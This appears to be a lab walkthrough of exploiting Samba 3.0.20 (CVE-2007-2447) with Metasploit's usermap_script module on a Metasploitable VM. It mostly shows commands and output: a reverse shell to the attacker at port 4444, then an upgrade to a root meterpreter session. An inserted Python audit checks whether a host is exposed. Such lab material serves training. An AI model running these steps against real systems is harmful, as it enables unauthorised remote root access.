0x04-1 Server-Side Exploitation: Samba 3.
2018-12-05
Gatociego
Breaking into a Linux server
msf > services -c port,info -p 135,445
Services
========
host port info
---- ---- ----
192.168.10.122 135 Microsoft Windows RPC
192.168.10.122 445 Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (workgroup:WORKGROUP )
192.168.10.128 135 Microsoft Windows RPC
192.168.10.128 445 Windows XP SP3 (language:English) (name:DH-CA8822AB9589) (workgroup:WORKGROUP )
192.168.10.254 445 Unix (Samba 3.0.20-Debian)
# Now the server at 192.168.10.254
Go to https://www.cvedetails.com and check whether Samba 3.0.20-Debian has a matching CVE ID.
# Search for a matching exploit module
msf > search cve:2007 type:exploit samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
# Choose the module ranked excellent; it has the higher chance of success
msf > use exploit/multi/samba/usermap_script
# View the exploit module's details
msf exploit(multi/samba/usermap_script) > info
Name: Samba "username map script" Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007-05-14
Provided by:
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.254 yes The target address
RPORT 139 yes The target port (TCP)
Payload information:
Space: 1024
Description:
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!
References:
https://cvedetails.com/cve/CVE-2007-2447/
OSVDB (34700)
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html
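From a defender's side, the module description above names the two preconditions a host must meet to be exposed: a Samba version in 3.0.20 through 3.0.25rc3 and the non-default "username map script" option set in [global]. The following Python audit is an added example (not from the original post and not Metasploit or Samba code) that checks both against a service banner and an smb.conf; the sample config and the script path in it are constructed for illustration.

```python
import re

# Affected range as stated in the module description: 3.0.20 through 3.0.25rc3.
# Tuples are (major, minor, patch, rc_rank); a final release ranks 99 so it sorts
# above every release candidate of the same patch level.
AFFECTED_LOW = (3, 0, 20, 99)
AFFECTED_HIGH = (3, 0, 25, 3)

def parse_version(banner):
    """Turn 'Unix (Samba 3.0.20-Debian)' or '3.0.25rc3' into a comparable tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", banner)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else 99)

def version_affected(banner):
    v = parse_version(banner)
    return v is not None and AFFECTED_LOW <= v <= AFFECTED_HIGH

def username_map_script(conf_text):
    """Return the value of 'username map script' in [global], or None.
    Samba option names are case-insensitive and ignore internal whitespace;
    lines starting with '#' or ';' are comments."""
    section, value = None, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "global" and "=" in line:
            key, val = line.split("=", 1)
            if re.sub(r"\s+", "", key).lower() == "usernamemapscript":
                value = val.strip()
    return value

def audit(banner, conf_text):
    """A host is exposed only when both conditions hold at once."""
    script = username_map_script(conf_text)
    affected = version_affected(banner)
    return {"version_affected": affected,
            "username_map_script": script,
            "exposed": affected and script is not None}

# Constructed sample smb.conf; the script path is a placeholder, not a real file.
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   # mapping hook of the kind the module description refers to
   Username Map Script = /etc/samba/scripts/mapusers.sh
[share]
   path = /srv/share
"""

if __name__ == "__main__":
    print(audit("Unix (Samba 3.0.20-Debian)", SAMPLE_CONF))
```

The banner string can be taken straight from the `services` output shown earlier; removing the option or upgrading past 3.0.25rc3 makes `exposed` false.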
# Set the options and run
msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.10.115:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EPsE8hpgZPCxacgE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "EPsE8hpgZPCxacgE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.115:4444 -> 192.168.10.254:58722) at 2018-12-05 18:09:12 +0800
# A session has been obtained; run a command in it
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:7f:de:bf
inet addr:10.10.10.254 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe7f:debf/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:38716 errors:0 dropped:0 overruns:0 frame:0
TX packets:547 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2543677 (2.4 MB) TX bytes:72178 (70.4 KB)
Interrupt:17 Base address:0x2000
eth1 Link encap:Ethernet HWaddr 00:0c:29:7f:de:c9
inet addr:192.168.10.254 Bcast:192.168.10.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe7f:dec9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:47084 errors:1 dropped:1 overruns:0 frame:0
TX packets:9312 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3330608 (3.1 MB) TX bytes:1689578 (1.6 MB)
Interrupt:18 Base address:0x2080
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:4956 errors:0 dropped:0 overruns:0 frame:0
TX packets:4956 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2376272 (2.2 MB) TX bytes:2376272 (2.2 MB)
# Background the session (this does not close it)
Ctrl + Z
^Z
Background session 1? [y/N] y
msf exploit(multi/samba/usermap_script) >
# View the help for the sessions command
msf exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]
Active session manipulation and interaction.
OPTIONS:
-C <opt> Run a Meterpreter Command on the session given with -i, or all
-K Terminate all sessions
-S <opt> Row search filter.
-c <opt> Run a command on the session given with -i, or all
-d List all inactive sessions
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-n <opt> Name or rename a session by ID
-q Quiet mode
-s <opt> Run a script or module on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List all active sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
# Run sessions with no arguments to list all currently available sessions
msf exploit(multi/samba/usermap_script) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.10.115:4444 -> 192.168.10.254:58722 (192.168.10.254)
# Interact with a session
msf exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...
# Close the session
Ctrl + C
^C
Abort session 1? If not, the foreground process in the session will be killed [y/N] y
""
[*] 192.168.10.254 - Command shell session 1 closed. Reason: User exit
About payloads
Attack payloads
An exploit is like a key that opens a door; what happens after the door is open is the job of the payload.
Run show payloads; by default msf selects a payload automatically.
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.115 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
The default is cmd/unix/reverse, which sends a reverse shell back over port 4444. This shell is usually limited in what it can do, so it should be upgraded to a meterpreter session.
# Upgrade the shell with the following command
sessions -u session_id
msf exploit(multi/samba/usermap_script) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.115:4433
[*] Sending stage (861480 bytes) to 192.168.10.254
[*] Meterpreter session 2 opened (192.168.10.115:4433 -> 192.168.10.254:42658) at 2018-12-05 18:20:07 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
# List the sessions
msf exploit(multi/samba/usermap_script) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.10.115:4444 -> 192.168.10.254:39390 (192.168.10.254)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain 192.168.10.115:4433 -> 192.168.10.254:42658 (192.168.10.254)